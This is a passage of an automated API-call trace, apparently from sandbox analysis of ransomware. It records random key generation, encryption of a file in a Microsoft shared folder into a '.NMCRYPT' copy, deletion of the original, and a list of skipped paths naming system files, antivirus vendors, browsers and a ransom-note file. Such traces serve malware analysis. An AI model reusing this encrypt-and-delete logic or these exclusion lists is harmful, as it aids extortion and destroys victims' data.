pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.020] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0148.020] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0148.021] CryptCreateHash (in: hProv=0x8e3990, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0148.021] CryptHashData (hHash=0x9ad878, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.021] CryptDeriveKey (in: hProv=0x8e3990, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad338) returned 1 [0148.021] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0148.021] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0148.021] wcslen (_String="\\\\?\\") returned 0x4 [0148.021] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad5f8) returned 1 [0148.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.021] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2520) returned 1 [0148.021] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0148.022] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.023] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.023] GetLastError () returned 0x0 [0148.023] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.024] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.024] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.024] GetLastError () returned 0x0 [0148.024] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.024] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.024] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.024] GetLastError () returned 0x0 [0148.024] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.024] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.024] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.024] GetLastError () returned 0x0 [0148.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.025] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.025] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.025] GetLastError () returned 0x0 [0148.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.025] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.025] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.025] GetLastError () returned 0x0 [0148.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.025] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.025] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.025] GetLastError () returned 0x0 [0148.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.025] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.025] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.025] GetLastError () returned 0x0 [0148.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.025] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0148.025] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0148.025] GetLastError () returned 0x0 [0148.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0148.025] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xd8, lpOverlapped=0x0) returned 1 [0148.025] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xd8, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xe0) returned 1 [0148.025] GetLastError () returned 0x0 [0148.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xe0, lpOverlapped=0x0) returned 1 [0148.026] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0148.026] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0148.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml")) returned 0x20 [0148.026] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml", dwFileAttributes=0x20) returned 0 [0148.026] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml") returned 1 [0148.026] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml")) returned 0 [0148.027] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" [0148.027] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0148.027] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB531.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb531.tmp")) returned 0xb531 [0148.027] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB531.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb531.tmp"), dwFlags=0x1) returned 0 [0148.027] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB531.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb531.tmp")) returned 1 [0148.028] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0148.028] wcslen (_String="OK") returned 0x2 [0148.028] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.028] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.028] CryptDestroyKey (hKey=0x9ad338) returned 1 [0148.028] CryptDestroyHash (hHash=0x9ad878) returned 1 [0148.028] CryptReleaseContext (hProv=0x8e3990, dwFlags=0x0) returned 1 [0148.028] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*NMCRYPT") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*Recovers your files.html") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*.exe") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*.dll") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*.lnk") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*.bat") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*.ini") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*.msi") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*.scf") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*pagefile.sys*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*NTUSER.DAT*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*AppData*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*\\winrar\\*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*\\java\\*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*\\windows\\*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*\\ESET\\*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*\\AVG\\*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*\\AVIRA\\*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*Atheros*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*Realtek*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*bootmgr*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*boot*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*boot*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*CONFIG.SYS*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*IO.SYS*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*MSDOS.SYS*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*NTDETECT.COM*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*ntldr*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*chrome*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*opera*") returned 0 [0148.028] PathMatchSpecW (pszFile="ipstr.xml", pszSpec="*firefox*") returned 0 [0148.029] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml", pszSpec="*") returned 1 [0148.029] strlen (_Str="NMoreira") returned 0x8 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0148.029] CryptGenRandom (in: 